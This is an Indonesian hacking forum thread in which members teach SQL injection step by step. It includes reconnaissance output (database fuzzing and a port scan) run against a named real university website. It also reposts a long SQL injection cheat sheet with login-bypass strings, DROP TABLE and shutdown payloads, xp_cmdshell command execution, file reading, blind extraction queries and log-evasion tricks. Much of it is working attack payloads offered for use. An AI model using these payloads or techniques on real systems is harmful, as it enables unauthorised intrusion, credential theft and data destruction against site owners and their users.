Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 37
http://idgs.in/195274
  1. #16

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by New_Dudutz View Post
    wah rada kurang ngerti nih bro bl00d13z,

    contohnya
    Code:
    UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE
    itu buat apa ya, itu SQL code ? gw rada bingung nyari2 code nya buat ngehubungin 1 page ke page lain.........@_@ ......
    format code ini:
    Code:
    UNION+ALL+SELECT+no_field+no_field+CONCAT_WS(PEMIS AH_HEXA_SQL,NAMA_FIELD1,NAMA_FIELD2,....)+FROM+NAM A_TABLE
    itu didapat setelah kita tau jumlah column, nama table, n nama column..
    itu sql query.. begitu kita masukin string berupa single quote ( ' ) pada path numerik misal ?id=12 dibelakang URL kemudian dari server ada respon error..tandanya path/modul tersebut ada vulnerabilty(baca:kelemahan) sql inject di site tersebut.. sisanya bisa kita exploitasi menggunakan query2 bertahap yang pada akhirnya bisa menemukan username & hash password dari sang admin webnya..

  2. Hot Ad
  3. #17
    Trademaks's Avatar
    Join Date
    Oct 2006
    Location
    Indonesia
    Posts
    1,946
    Points
    3,106.70
    Thanks: 3 / 3 / 3

    Default

    http://www.fe.trisakti.ac.id/bacaber...ersion,4,5,6/*

    4.0.12-nt
    selanjutnya bagaimana ?

  4. #18

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by Trademaks View Post
    ver 4 ma ga bisa di information_schema mas... kalo mau di fuzz n tebak2 pke tools.. yg ane dpt cm ini :

    Code:
    [+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)
    [-] Proxy Not Given
    [+] Gathering MySQL Server Configuration...
            Database: webfe
            User: adminfe@localhost
            Version: 4.0.12-nt
    [+] Beginning table and column fuzzer...
    [+] Number of tables names to be fuzzed: 334
    [+] Number of column names to be fuzzed: 249
    [+] Searching for tables and columns...
    
    [!] Found a table called: news
    
    [+] Now searching for columns inside table "news"
    [!] Found a column called: id
    [!] Found a column called: status
    [-] Done searching inside table "news" for columns!
    
    [!] Found a table called: session
    
    [+] Now searching for columns inside table "session"
    [-] Done searching inside table "session" for columns!
    
    [!] Found a table called: News
    
    [+] Now searching for columns inside table "News"
    [!] Found a column called: id
    [!] Found a column called: status
    [-] Done searching inside table "News" for columns!
    tabel news ma session doank klo di ane..lom diupdate uy list fuzztablenya..
    klo dijumping jg keqnya ini ga bs..ga pake virtualhosting dia..sedangkan dari service :
    Code:
    PORT     STATE  SERVICE            VERSION
    21/tcp   open   ftp                Microsoft ftpd 5.0
    23/tcp   closed telnet
    25/tcp   closed smtp
    80/tcp   open   http               Microsoft IIS webserver 5.0
    110/tcp  closed pop3
    443/tcp  open   https?
    3389/tcp open   microsoft-rdp      Microsoft Terminal Service
    4662/tcp closed edonkey
    5900/tcp closed vnc
    6881/tcp closed bittorrent-tracker
    8000/tcp closed http-alt
    8001/tcp closed unknown
    8002/tcp closed unknown
    8007/tcp closed ajp12
    8008/tcp closed unknown
    8009/tcp closed ajp13
    8010/tcp closed unknown
    8011/tcp closed unknown
    8021/tcp closed ftp-proxy
    8022/tcp closed unknown
    Service Info: OS: Windows
    whahahahha ternyata webserverny IIS 5 mas.. banyak itu exploitnya beredar, ane ga bahas ya..bkn topic sqli soalny..OOT tar ^^

  5. #19
    New_Dudutz's Avatar
    Join Date
    Jan 2007
    Location
    Earth~
    Posts
    1,178
    Points
    1,513.50
    Thanks: 0 / 1 / 1

    Default

    wah ternyata belajar ini susah jg ya, musti bener2 ngerti..........................bro bl00di3z, rumah nya di mana sih, kalo deket , eke mau belajar.......wakakakakkaka

    Sell Magic Item 100% Low Price High Quality , Not ********, Contact Me
    -dream_heaven4873@yahoo.com / PM

  6. #20

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by New_Dudutz View Post
    wah ternyata belajar ini susah jg ya, musti bener2 ngerti..........................bro bl00di3z, rumah nya di mana sih, kalo deket , eke mau belajar.......wakakakakkaka
    >.< ane org bdg.., blajarny dsni jg kan bisa.. udah ad yg berhasil lom belajarny? klo manual enakny ngerti tar alur exploitasiny dibanding otomatis, bahkan klo sql querynya jago wah bisa lebih manis sqliny..(ane trus terang oon kalo soal sql query ama php,pkony yg berbau web, cm dasar2 doank tauny)..^^ btw di forum idgs ini jg ada bug yg mayan bs bkin semua acccount di sadap (ga ane telusuri lebih jauh) >.< tp klo sqli uda kebal disini..^^ LFI,RFI jg ga ada..vbulletinnya pas mlih verny ..wheheh

  7. #21
    New_Dudutz's Avatar
    Join Date
    Jan 2007
    Location
    Earth~
    Posts
    1,178
    Points
    1,513.50
    Thanks: 0 / 1 / 1

    Default

    bingungnya nambahin code2 nya di belakang link itu.......rada bingung musti di apain......

    haha......

    ini lagi di pelajarin terus nih, ayo terus bantu ya guru bl00d13z.......

    Sell Magic Item 100% Low Price High Quality , Not ********, Contact Me
    -dream_heaven4873@yahoo.com / PM

  8. #22

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by New_Dudutz View Post
    bingungnya nambahin code2 nya di belakang link itu.......rada bingung musti di apain......

    haha......

    ini lagi di pelajarin terus nih, ayo terus bantu ya guru bl00d13z.......
    lagi ke target mana nih?..bagh jgn panggil guru.. ane ga bs ngajar

  9. #23
    New_Dudutz's Avatar
    Join Date
    Jan 2007
    Location
    Earth~
    Posts
    1,178
    Points
    1,513.50
    Thanks: 0 / 1 / 1

    Default

    belom ada target, masih di pelajarin aja...........

    bingung nya abis itu link di kasih single_quote(') , kan eror tuh, nah musti di apain lagi tu, masalahnya gw belom ngerti2 banget sama logika nya SQLi........

    T_T

    Sell Magic Item 100% Low Price High Quality , Not ********, Contact Me
    -dream_heaven4873@yahoo.com / PM

  10. #24

    Join Date
    May 2008
    Location
    /proc/sys/kernel/randomize_va_space
    Posts
    875
    Points
    1,326.90
    Thanks: 0 / 13 / 8

    Default

    Quote Originally Posted by New_Dudutz View Post
    belom ada target, masih di pelajarin aja...........

    bingung nya abis itu link di kasih single_quote(') , kan eror tuh, nah musti di apain lagi tu, masalahnya gw belom ngerti2 banget sama logika nya SQLi........

    T_T
    langsung cari kolom tinggal.. pake order+by+num--, mulai dari
    order+by+1-- liat hasilny..gmn halamanny error pa ga,trus liat
    order+by+2-- hasilny sm pa ga sama order+by+1--, kalo sama loncatin ke nomer yg aga tinggi, misal order+by+5-- klo ternyata berubah(misal dari ga error jadi error lagi) mundurin nomerny.. ke order+by+4-- liat lagi hasilny, error pa ga, ternyata masih error misal, mundur deh mpe order+by+3--
    nah pas di order+by+3-- ga error ternyata.. (dgn gni ane simpulin ada 3 column di path db yg sedang kamu inject),,selanjutnya kasih nilai null/negatif di awal id, misal:

    ?id=14+order+by+3--

    skrg coba gni:

    ?id=-14+union+all+select+1,2,3-- atau ?id=null+union+all+select+1,2,3--

    tar keluar angka ajaib di halamannya..whahah..trus baca lagi deh tutorny..^^

  11. #25
    nveuu's Avatar
    Join Date
    Apr 2007
    Location
    di warnet
    Posts
    2,496
    Points
    494.79
    Thanks: 36 / 20 / 11

    Default

    share dikit SQLi sheet...

    translate dewe... atw ad yg mau berbaik hati men translate kan nya untuk semua ^^ gw kasi GRP da...

    SQL Injection Cheat Sheet

    author : ferruh@mavituna.com

    SQL Injection Cheat Sheet, Document Version 1.4
    About SQL Injection Cheat Sheet

    Currently only for MySQL and Microsoft SQL Server, some ORACLE and some PostgreSQL. Most of samples are not correct for every single situation. Most of the real world environments may change because of parenthesis, different code bases and unexpected, strange SQL sentences.

    Samples are provided to allow reader to get basic idea of a potential attack and almost every section includes a brief information about itself.
    M : MySQL
    S : SQL Server
    P : PostgreSQL
    O : Oracle
    + : Possibly all other databases
    Examples;

    * (MS) means : MySQL and SQL Server etc.
    * (M*S) means : Only in some versions of MySQL or special conditions see related note and SQL Server


    Syntax Reference, Sample Attacks and Dirty SQL Injection Tricks
    Ending / Commenting Out / Line Comments
    Line Comments

    Comments out rest of the query.
    Line comments are generally useful for ignoring rest of the query so you don’t have to deal with fixing the syntax.

    * -- (SM)
    DROP sampletable;--

    * # (M)
    DROP sampletable;#

    Line Comments Sample SQL Injection Attacks

    * Username: admin'--
    * SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
    This is going to log you as admin user, because rest of the SQL query will be ignored.

    Inline Comments

    Comments out rest of the query by not closing them or you can use for bypassing blacklisting, removing spaces, obfuscating and determining database versions.

    * /*Comment Here*/ (SM)
    o DROP/*comment*/sampletable
    o DR/**/OP/*bypass blacklisting*/sampletable
    o SELECT/*avoid-spaces*/password/**/FROM/**/Members

    * /*! MYSQL Special SQL */ (M)
    This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.

    SELECT /*!32302 1/0, */ 1 FROM tablename

    Classical Inline Comment SQL Injection Attack Samples

    * ID: 10; DROP TABLE members /*
    Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --

    * SELECT /*!32302 1/0, */ 1 FROM tablename
    Will throw an divison by 0 error if MySQL version is higher than 3.23.02

    MySQL Version Detection Sample Attacks

    * ID: /*!32302 10*/
    * ID: 10
    You will get the same response if MySQL version is higher than 3.23.02

    * SELECT /*!32302 1/0, */ 1 FROM tablename
    Will throw an divison by 0 error if MySQL version is higher than 3.23.02

    Stacking Queries

    Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.

    * ; (S)
    SELECT * FROM members; DROP members--

    Ends a query and starts a new one.
    Language / Database Stacked Query Support Table

    unknown SQL Server MySQL PostgreSQL ORACLE MS Access
    ASP supported unknown unknown unknown not supported
    ASP.NET supported unknown unknown unknown not supported
    PHP supported not supported supported unknown not supported
    Java unknown unknown unknown not supported not supported

    About MySQL and PHP;
    To clarify some issues;
    PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?
    Stacked SQL Injection Attack Samples

    * ID: 10;DROP members --
    * SELECT * FROM products WHERE id = 10; DROP members--

    This will run DROP members SQL sentence after normal SQL Query.
    If Statements

    Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.
    MySQL If Statement

    * IF(condition,true-part,false-part) (M)
    SELECT IF(1=1,'true','false')

    SQL Server If Statement

    * IF condition true-part ELSE false-part (S)
    IF (1=1) SELECT 'true' ELSE SELECT 'false'

    If Statement SQL Injection Attack Samples

    if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
    This will throw an divide by zero error if current logged user is not "sa" or "dbo".
    Using Integers

    Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.

    * 0xHEXNUMBER (SM)
    You can write hex like these;

    SELECT CHAR(0x66) (S)
    SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
    SELECT 0x50 + 0x45 (this is integer now!) (M)

    String Operations

    String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
    String Concatenation

    * + (S)
    SELECT login + '-' + password FROM members

    * || (*MO)
    SELECT login || '-' || password FROM members

    *About MySQL "||";
    If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using CONCAT() function in MySQL.

    * CONCAT(str1, str2, str3, ...) (M)
    Concatenate supplied strings.
    SELECT CONCAT(login, password) FROM members

    Strings without Quotes

    These are some direct ways to using strings but it’s always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.

    * 0x457578 (M) - Hex Representation of string
    SELECT 0x457578
    This will be selected as string in MySQL.

    In MySQL easy way to generate hex representations of strings use this;
    SELECT CONCAT('0x',HEX('c:\\boot.ini'))

    * Using CONCAT() in MySQL
    SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
    This will return ‘KLM’.

    * SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
    This will return ‘KLM’.

    Hex based SQL Injection Samples

    * SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
    This will show the content of c:\boot.ini

    String Modification & Related

    * ASCII() (SMP)
    Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.

    SELECT ASCII('a')

    * CHAR() (SM)
    Convert an integer of ASCII.

    SELECT CHAR(64)

    Union Injections

    With union you do SQL queries cross-table. Basically you can poison query to return records from another table.

    SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
    This will combine results from both news table and members table and return all of them.

    Another Example :
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
    UNION – Fixing Language Issues

    While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.

    * SQL Server (S)
    Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.

    SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members

    * MySQL (M)
    Hex() for every possible issue

    Bypassing Login Screens (SMO+)
    SQL Injection 101, Login tricks

    * admin' --
    * admin' #
    * admin'/*
    * ' or 1=1--
    * ' or 1=1#
    * ' or 1=1/*
    * ') or '1'='1--
    * ') or ('1'='1--
    * ....

    * Login as different user (SM*)
    ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--

    *Old versions of MySQL doesn't support union queries
    Bypassing second MD5 hash check login screens

    If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
    Bypassing MD5 Hash Check Example (MSP)

    Username : admin
    Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

    81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)

    Error Based - Find Columns Names
    Finding Column Names with HAVING BY - Error Based (S)

    In the same order,

    * ' HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
    * ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
    * If you are not getting any more error then it's done.

    Finding how many columns in SELECT query by ORDER BY (MSO+)

    Finding column number by ORDER BY can speed up the UNION SQL Injection process.

    * ORDER BY 1--
    * ORDER BY 2--
    * ORDER BY N-- so on
    * Keep going until get an error. Error means you found the number of selected columns.

    Data types, UNION, etc.
    Hints,

    * Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records with distinct.
    * To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (if injection is in WHERE). This can be critical if you are only getting one result at a time.
    * Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.
    o Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)

    Finding Column Type

    * ' union select sum(columntofind) from users-- (S)
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

    If you are not getting error it means column is numeric.

    * Also you can use CAST() or CONVERT()
    o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--

    * 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
    No Error - Syntax is right. MS SQL Server Used. Proceeding.

    * 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
    No Error – First column is an integer.

    * 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
    Error! – Second column is not an integer.

    * 11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
    No Error – Second column is a string.

    * 11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
    Error! – Third column is not an integer. ...

    Microsoft OLE DB Provider for SQL Server error '80040e07'
    Explicit conversion from data type int to image is not allowed.

    You’ll get convert() errors before union target errors ! So start with convert() then union
    Simple Insert (MSO+)
    '; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
    Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes

    @@version (MS)
    Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions.

    INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
    Bulk Insert (S)

    Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.

    1. Create table foo( line varchar(8000) )
    2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
    3. Drop temp table, and repeat for another file.

    BCP (S)

    Write text file. Login Credentials are required to use this function.
    bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
    VBS, WSH in SQL Server (S)

    You can use VBS, WSH scripting in SQL Server because of ActiveX support.

    declare @o int
    exec sp_oacreate 'wscript.shell', @o out
    exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
    Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
    Executing system commands, xp_cmdshell (S)

    Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.

    EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'

    Simple ping check (configure your firewall or sniffer to identify request before launch it),

    EXEC master.dbo.xp_cmdshell 'ping <ip address>'

    You can not read results directly from error or union or something else.
    Some Special Tables in SQL Server (S)

    * Error Messages
    master..sysmessages

    * Linked Servers
    master..sysservers

    * Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )
    SQL Server 2000: masters..sysxlogins
    SQL Server 2005 : sys.sql_logins

    More Stored Procedures for SQL Server (S)

    1. Cmd Execute (xp_cmdshell)
    exec master..xp_cmdshell 'dir'

    2. Registry Stuff (xp_regread)
    1. xp_regaddmultistring
    2. xp_regdeletekey
    3. xp_regdeletevalue
    4. xp_regenumkeys
    5. xp_regenumvalues
    6. xp_regread
    7. xp_regremovemultistring
    8. xp_regwrite
    exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\pa rameters', 'nullsessionshares'
    exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters \validcommunities'

    3. Managing Services (xp_servicecontrol)
    4. Medias (xp_availablemedia)
    5. ODBC Resources (xp_enumdsn)
    6. Login mode (xp_loginconfig)
    7. Creating Cab Files (xp_makecab)
    8. Domain Enumeration (xp_ntsec_enumdomains)
    9. Process Killing (need PID) (xp_terminate_process)
    10. Add new procedure (virtually you can execute whatever you want)
    sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
    exec xp_webserver
    11. Write text file to a UNC or an internal path (sp_makewebtask)

    MSSQL Bulk Notes

    SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/

    DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0

    HOST_NAME()
    IS_MEMBER (Transact-SQL)
    IS_SRVROLEMEMBER (Transact-SQL)
    OPENDATASOURCE (Transact-SQL)

    INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"

    OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx

    You can not use sub selects in SQL Server Insert queries.
    SQL Injection in LIMIT (M) or ORDER (MSO)

    SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;

    If injection is in second limit you can comment it out or use in your union injection
    Shutdown SQL Server (S)

    When you really pissed off, ';shutdown --
    Enabling xp_cmdshell in SQL Server 2005

    By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.

    EXEC sp_configure 'show advanced options',1
    RECONFIGURE

    EXEC sp_configure 'xp_cmdshell',1
    RECONFIGURE
    Finding Database Structure in SQL Server (S)
    Getting User defined Tables

    SELECT name FROM sysobjects WHERE xtype = 'U'
    Getting Column Names

    SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
    Moving records (S)

    * Modify WHERE and use NOT IN or NOT EXIST,
    ... WHERE users NOT IN ('First User', 'Second User')
    SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one

    * Using Dirty Tricks
    SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int

    Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21


    Fast way to extract data from Error Based SQL Injections in SQL Server (S)

    ';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--


    Blind SQL Injections
    About Blind SQL Injections

    In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.

    Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
    Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.

    In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.
    Real and a bit Complex Blind SQL Injection Attack Sample

    This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.

    TRUE and FALSE flags mark queries returned true or false.

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--

    TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--

    FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--

    Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.

    Waiting For Blind SQL Injections

    First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
    WAIT FOR DELAY 'time' (S)

    This is just like sleep, wait for spesified time. CPU safe way to make database wait.

    WAITFOR DELAY '0:0:10'--

    Also you can use fractions like this,

    WAITFOR DELAY '0:0:0.51'
    Real World Samples

    * Are we 'sa' ?
    if (select user) = 'sa' waitfor delay '0:0:10'
    * ProductID = 1;waitfor delay '0:0:10'--
    * ProductID =1);waitfor delay '0:0:10'--
    * ProductID =1';waitfor delay '0:0:10'--
    * ProductID =1');waitfor delay '0:0:10'--
    * ProductID =1));waitfor delay '0:0:10'--
    * ProductID =1'));waitfor delay '0:0:10'--

    BENCHMARK() (M)

    Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!

    BENCHMARK(howmanytimes, do this)
    Real World Samples

    * Are we root ? woot!
    IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))

    * Check Table exist in MySQL
    IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))

    pg_sleep(seconds) (P)

    Sleep for supplied seconds.

    * SELECT pg_sleep(10);
    Sleep 10 seconds.

    Covering Tracks
    SQL Server -sp_password log bypass (S)

    SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)
    Clear SQL Injection Tests

    These tests are simply good for blind sql injection and silent attacks.

    1. product.asp?id=4 (SMO)
    1. product.asp?id=5-1
    2. product.asp?id=4 OR 1=1

    2. product.asp?name=Book
    1. product.asp?name=Bo’%2b’ok
    2. product.asp?name=Bo’ || ’ok (OM)
    3. product.asp?name=Book’ OR ‘x’=’x

    Some Extra MySQL Notes

    * Sub Queries are working only MySQL 4.1+
    * Users
    o SELECT User,Password FROM mysql.user;
    * SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SH A1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
    * SELECT ... INTO DUMPFILE
    o Write query into a new file (can not modify existing files)
    * UDF Function
    o create function LockWorkStation returns integer soname 'user32';
    o select LockWorkStation();
    o create function ExitProcess returns integer soname 'kernel32';
    o select exitprocess();
    * SELECT USER();
    * SELECT password,USER() FROM mysql.user;
    * First byte of admin hash
    o SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
    * Read File
    o query.php?user=1+union+select+load_file(0x63...),1 ,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 ,1,1,1,1
    * MySQL Load Data inifile
    o By default it’s not avaliable !
    + create table foo( line blob );
    load data infile 'c:/boot.ini' into table foo;
    select * from foo;
    * More Timing in MySQL
    * select benchmark( 500000, sha1( 'test' ) );
    * query.php?user=1+union+select+benchmark(500000,sha 1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,1,1,1,1,1
    * select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
    Enumeration data, Guessed Brute Force
    o select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );

    Potentially Useful MySQL Functions

    * MD5()
    MD5 Hashing
    * SHA1()
    SHA1 Hashing

    * PASSWORD()
    * ENCODE()
    * COMPRESS()
    Compress data, can be great in large binary reading in Blind SQL Injections.
    * ROW_COUNT()
    * SCHEMA()
    * VERSION()
    Same as @@version

    Second Order SQL Injections

    Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.

    Name : ' + (SELECT TOP 1 password FROM users ) + '
    Email : xx@xx.com

    If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.
    Forcing SQL Server to get NTLM Hashes

